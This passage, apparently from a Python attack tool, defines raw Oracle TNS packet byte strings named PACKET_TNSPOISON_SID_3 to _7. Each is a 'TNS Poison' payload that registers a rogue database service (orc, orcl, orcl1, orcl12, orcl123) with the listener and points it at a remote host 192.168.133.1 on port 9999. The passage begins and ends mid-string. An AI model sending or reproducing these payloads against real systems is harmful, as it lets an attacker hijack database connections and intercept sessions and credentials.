2316>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb-\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99-\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc2{FlM\x1eC\xb9\x90\x89\x11\x1dT\x91\x08}P\xa9\xff\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x88E\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x05\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\xe8\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb-\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orXDB\x00\xa0\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xc8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00or\x00\x00\x00'
PACKET_TNSPOISON_SID_3 = b'\x05\x86\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05|$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9?\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x04\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5\xdc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00I\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8>\x0b\x00\x00\x00\x00\xbc\x1d\xb3C{\xa0O\xcc\x88\xb6\xc5\xeb\xf6b\xe2g\x04\x00\x00\x00\x00\x00\x00\x00\xe0E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02I\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5\xdc\n\x00\x00\x00\x00orc\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00P\xa9\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7>\x0b\x00\x00\x00\x00orcXDB\x00\x07\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f>\x0b\x00\x00\x00\x00orcXDB\x00\x01\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00 \xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6>\x0b\x00\x00\x00\x00orc\x00\x04\x00\x00\x00\x00\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orc\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xe8j\xf1\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfI\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9>\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xe8j\xf1\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5>\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97>\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fI\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8>\x0b\x00\x00\x00\x002\xb6\xccUu\xebH\xdf\x90\x97\x1ct\xdc\x03\xa1\x8c\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xe0\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfI\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xc8\xaf\xea\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97>\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49184))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2936>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb\xdc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99\xdc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&\xe1A\xbfx\xe6B\xa6\xab\xcd\xdd\xef\xc9\xe1\xffrP\xa9\xff\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x88E\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00h\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb\xdc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x07\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f>\x0b\x00\x00\x00\x00orcXDB\x00 \xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00H\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orc\x00\x00\x00\x00'
PACKET_TNSPOISON_SID_4 = b'\x05\x8a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x80$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00(\xe9F\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x08\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5)\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00N\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa8E\x0b\x00\x00\x00\x00\xe8\xfaB(\xc9\xb7D4\xa1F\xa9\xdcR\xce\xa7\x82\x05\x00\x00\x00\x00\x00\x00\x00\xd8E\xec\x1a\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02N\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5)\x0b\x00\x00\x00\x00orcl\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x90tt\x15\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00htt\x15\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa6E\x0b\x00\x00\x00\x00orclXDB\x00\x08\x00\x00\x00\x00\x00\x00\x00\x90tt\x15\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orclXDB\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0\xd9\xe8\x1a\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x98\xd9\xe8\x1a\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xa6E\x0b\x00\x00\x00\x00orcl\x00\x05\x00\x00\x00\x00\x00\x00\x00\xc0\xd9\xe8\x1a\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc)\x0b\x00\x00\x00\x00orcl\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x10\x1ax\x15\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa8E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\x10\x1ax\x15\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00H\xa5E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd8\x9eE\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa7E\x0b\x00\x00\x00\x00\xc2#\x0b\x17=\xd6G\x9a\xbe\xd1\xea\xbd\xa2mss\x05\x00\x00\x00\x00\x00\x00\x00`\xaaq\x17\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xd8\x91\xd4\x1a\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x008\xebh\x15\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x9eE\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49188))\x00DISPATCHER <machine: 192.168.133.1 , pid: 3032>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb)\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99)\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002\xd4`M\xd6%N]\x9a\xbe\xc9H\xe2\x16\xdfNhtt\x15\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x80E\xec\x1a\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x05\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\xe0\xd9\xe8\x1a\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb)\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x08\x00\x00\x00\x00\x00\x00\x00\x90tt\x15\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orclXDB\x00\x98\xd9\xe8\x1a\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xc0\xd9\xe8\x1a\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc)\x0b\x00\x00\x00\x00orcl\x00'
PACKET_TNSPOISON_SID_5 = b'\x05\x92\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x88$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9G\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5\xdc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00B\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8F\x0b\x00\x00\x00\x00\xde&\xd5\x89\xc2\xb5K\xbf\x9f\x9c\x8f\x1c\xad\xe3X\xe4\x06\x00\x00\x00\x00\x00\x00\x00\xd0El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02B\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5\xdc\n\x00\x00\x00\x00orcl1\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0\x81\xbf,\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x98\x81\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7F\x0b\x00\x00\x00\x00orcl1XDB\x00\t\x00\x00\x00\x00\x00\x00\x00\xc0\x81\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fF\x0b\x00\x00\x00\x00orcl1XDB\x00\x01\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\xd4i2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00P\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6F\x0b\x00\x00\x00\x00orcl1\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl1\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xe0\x80E2\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9F\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xe0\x80E2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5F\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97F\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8F\x0b\x00\x00\x00\x00\xa2n\x97\xfb\n4La\xb1*H/t\xe3G?\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xd0\x91T2\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00h\x81\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97F\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49192))\x00DISPATCHER <machine: 192.168.133.1 , pid: 1716>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb\xdc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99\xdc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\\x80\x83K\xdd\xbc+\xc5F\x15\x83M\xef\x98\x81\xbf,\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00xEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x04\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x98\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb\xdc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\t\x00\x00\x00\x00\x00\x00\x00\xc0\x81\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fF\x0b\x00\x00\x00\x00orcl1XDB\x00P\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl1\x00\x00'
PACKET_TNSPOISON_SID_6 = b'\x05\x9a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x90$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\\xeaB\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x18\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5-\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00M\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\xa9A\x0b\x00\x00\x00\x00\x8c$ez\xe2\xdfN\xb6\xa6\xff\x84S\xc2<k\x05\x07\x00\x00\x00\x00\x00\x00\x00\xd0El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02M\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00h\xf5-\x0b\x00\x00\x00\x00orcl12\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\n\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00`)D2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x008)D2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xa8A\x0b\x00\x00\x00\x00orcl12XDB\x00\n\x00\x00\x00\x00\x00\x00\x00`)D2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fA\x0b\x00\x00\x00\x00orcl12XDB\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xa7A\x0b\x00\x00\x00\x00orcl12\x00\x07\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00orcl12\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(\x94\xba,\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\xaaA\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00(\x94\xba,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6A\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97A\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xa8A\x0b\x00\x00\x00\x00B6w~\x80\tK^\x83\xafF\xdaE\xbeu\xe9\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xd0\x91T2\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97A\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49196))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2528>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb-\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99-\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x06\x1eu\xbcUG\xe6\xac\x95\xa4\x0c\xac\x8d\x1ac8)D2\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00xEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x14\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00X\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\xfb-\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\n\x00\x00\x00\x00\x00\x00\x00`)D2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fA\x0b\x00\x00\x00\x00orcl12XDB\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00orcl12\x00\x00\x00'
PACKET_TNSPOISON_SID_7 = b'\x05\x9e\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x94$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9\x81\x0c\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5 \x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8\x80\x0c\x00\x00\x00\x00\x02=\xd3\xc4\x7f!IA\x87[%\x8b\t/\x1au\x08\x00\x00\x00\x00\x00\x00\x00\xd0El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02|\x0c\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5 \x0b\x00\x00\x00\x00orcl123\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x98\xc6\xbf,\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00p\xc6\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7\x80\x0c\x00\x00\x00\x00orcl123XDB\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x98\xc6\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f\x80\x0c\x00\x00\x00\x00orcl123XDB\x00\x01\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6\x80\x0c\x00\x00\x00\x00orcl123\x00\x08\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc 